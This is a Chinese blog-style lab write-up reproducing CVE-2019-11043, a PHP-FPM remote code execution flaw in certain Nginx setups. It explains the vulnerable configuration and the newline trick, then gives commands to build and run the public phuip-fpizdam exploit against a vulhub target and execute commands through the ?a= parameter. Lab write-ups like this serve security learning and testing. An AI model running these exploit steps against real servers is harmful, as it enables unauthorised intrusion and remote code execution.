【漏洞复现】PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

一、漏洞简介

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送换行符%0a 时,服务器返回异常。该漏洞需要在nginx.conf 中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) { 
	... 
	fastcgi_split_path_info ^(.+?\.php)(/.*)$; 
	fastcgi_param PATH_INFO $fastcgi_path_info; 
	fastcgi_pass   php:9000; 
	...
}

攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp(正则表达式)。 Regexp被损坏导致PATH_INFO为,从而触发该漏洞。

CGI的环境变量PATH_INFO的内容是URL中的一部分,例如请求URL为下面所示时,PATH_INFO获得的值为/yunsle1/yunsle2
http://10.211.55.6/index.php/yunsle1/yunsle2?a=yunsle

影响范围:
在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

  • PHP 7.0 版本
  • PHP 7.1 版本
  • PHP 7.2 版本
  • PHP 7.3 版本

二、漏洞环境准备

攻击机:kali

  • 安装golang环境:
apt-get install golang -y

靶机:Ubuntu

  • 使用vulhub进行漏洞环境的复现
    在这里插入图片描述

三、漏洞复现

环境启动后,访问http://your-ip:8080/index.php即可查看到一个默认页面。
在这里插入图片描述

安装漏洞利用工具EXP:

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam

在这里插入图片描述

go get -v 查看版本信息
go build 执行完之后会生成一个可执行文件

在这里插入图片描述
报错原因:默认使用的是proxy.golang.org,在国内无法访问
报错解决:执行命令:go env -w GOPROXY=https://goproxy.cn(换一个国内能够访问的代理地址)
在这里插入图片描述
执行命令:

./phuip-fpizdam "http://xxx:8080/index.php"   
或
go run . "http://xxx:8080/index.php"

漏洞利用:
在这里插入图片描述
在这里插入图片描述
注意:因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值